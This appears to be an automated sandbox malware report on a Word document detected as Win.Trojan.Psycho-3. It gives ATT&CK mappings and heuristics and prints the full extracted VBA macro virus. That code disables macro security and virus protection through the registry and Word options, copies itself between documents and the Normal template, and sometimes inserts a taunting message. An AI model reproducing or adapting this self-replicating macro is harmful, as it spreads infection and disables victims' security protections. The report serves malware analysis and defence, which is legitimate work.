MALICIOUS
120
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample contains VBA macros, specifically a Document_Open macro, which is a common technique for malicious Office documents. The macro attempts to disable security warnings and modify macro security settings, indicating an intent to execute further malicious code or infect other documents. The ClamAV detection as 'Win.Trojan.Psycho-3' strongly suggests a trojan family.
Heuristics 3
-
ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Psycho-3
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 10898 bytes |
SHA-256: 2b705ddf4b69263ffb48cc69844d61ca6a4a5e3b71be9b49bafc746ca2f89865 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThissDocument"
Attribute VB_Base = "1Normal.ThissDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
' Åñëè òû ÷èòàåøü ýòè ñòðîêè, çíà÷èò òû óæå íåìíîãî øàðèøü
' â ìàêðîñàõ, è ýòî åñòü õîðîøî. Òû ñïàñèòåëü ìèðà, è òîëüêî
' òû äîëæåí ðàçîáðàòüñÿ êàê îí ðàáîòàåò è óäàëèòü Åãî. Óäà÷è!.
' Ýòîò êîä íàïèñàí â ÷èñòî ïîçíàâàòåëüíûõ öåëÿõ (êîíå÷íî
' îí íåìíîãî ëåâûé, íî ÿ è íå ñîáèðàëñÿ íàïèñàòü êðóòîé âèðóñ
' è âñå ïîõåðèòü, ïðîñòî îí óíè÷òîæàåò äðóãèå âèðóñû ...)
' Ñ íàèëó÷øèìè ïîæåëàíèÿìè Extremist :-)
On Error Resume Next
If System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") <> "" Then
CommandBars("Macro").Controls(3).Enabled = False
CommandBars("Macro").Controls(4).Enabled = False
System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1&
Else
'CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1): Options.SaveNormalPrompt = (1 - 1)
End If
Set ActDoc = ActiveDocument.VBProject.VBComponents.Item(1)
Set NormTemp = NormalTemplate.VBProject.VBComponents.Item(1)
NTColLn = NormTemp.CodeModule.CountOfLines
ADColLn = ActDoc.CodeModule.CountOfLines
BGN = 2
If ActDoc.Name <> "ThissDocument" Or ADColLn < 4 Then DoAD = True
If NormTemp.Name <> "ThissDocument" Or NTColLn < 4 Then DoNT = True
If DoNT <> True And DoAD <> True Then GoTo NoToInfect
'
If DoNT = True Then
NormTemp.Name = "ThissDocument"
If NTColLn > 0 Then NormTemp.CodeModule.DeleteLines 1, NTColLn
Do While ActDoc.CodeModule.Lines(1, 1) = ""
ActDoc.CodeModule.DeleteLines 1
Loop
NormTemp.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ActDoc.CodeModule.Lines(BGN, 1) <> ""
NormTemp.CodeModule.InsertLines BGN, ActDoc.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
'
If DoAD = True Then
ActDoc.Name = "ThissDocument"
If ADColLn > 0 Then ActDoc.CodeModule.DeleteLines 1, ADColLn
Do While NormTemp.CodeModule.Lines(1, 1) = ""
NormTemp.CodeModule.DeleteLines 1
Loop
ActDoc.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NormTemp.CodeModule.Lines(BGN, 1) <> ""
ActDoc.CodeModule.InsertLines BGN, NormTemp.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
NoToInfect:
'Destruct
If Year(Now) > 2001 And Rnd > 0.95 Then
Selection.EndKey wdStory
Selection.TypeParagraph
Selection.TypeText "Hi LameR": Selection.TypeParagraph
Selection.TypeText "The Extremist has you..": Selection.TypeParagraph
Selection.LanguageID = wdRussian
End If
'
If NTColLn <> 0 And ADColLn = 0 And (InStr(1, ActiveDocument.Name, "Äîêóìåíò") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Äîêóìåíò") = True) Then
ActiveDocument.Saved = True: End If
End Sub
' Processing file: /opt/analyzer/scan_staging/5a35a19d1787477ba56d2f9756078c3a.bin
' ===============================================================================
' Module streams:
' Macros/VBA/ThissDocument - 5339 bytes
' Line #0:
' FuncDefn (Private Sub Document_Open())
' Line #1:
' QuoteRem 0x0000 0x0039 " Åñëè òû ÷èòàåøü ýòè ñòðîêè, çíà÷èò òû óæå íåìíîãî øàðèøü"
' Line #2:
' QuoteRem 0x0000 0x003C " â ìàêðîñàõ, è ýòî åñòü õîðîøî. Òû ñïàñèòåëü ìèðà, è òîëüêî"
' Line #3:
' QuoteRem 0x0000 0x003D " òû äîëæåí ðàçîáðàòüñÿ êàê îí ðàáîòàåò è óäàëèòü Åãî. Óäà÷è!."
' Line #4:
' QuoteRem 0x0000 0x0037 " Ýòîò êîä íàïèñàí â ÷èñòî ïîçíàâàòåëüíûõ öåëÿõ (êîíå÷íî"
' Line #5:
' QuoteRem 0x0000 0x003C " îí íåìíîãî ëåâûé, íî ÿ è íå ñîáèðàëñÿ íàïèñàòü êðóòîé âèðóñ"
' Line #6:
' QuoteRem 0x0000 0x0039 " è âñå ïîõåðèòü, ïðîñòî îí óíè÷òîæàåò äðóãèå âèðóñû ...)"
' Line #7:
' QuoteRem 0x0000 0x0028 " Ñ íàèëó÷øèìè ïîæåëàíèÿìè Extremist :-)"
' Line #8:
' OnError (Resume Next)
' Line #9:
' LitStr 0x0000 ""
' LitStr 0x003D "HKEY_CURRENT_USER\Software\Microsoft\Office
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.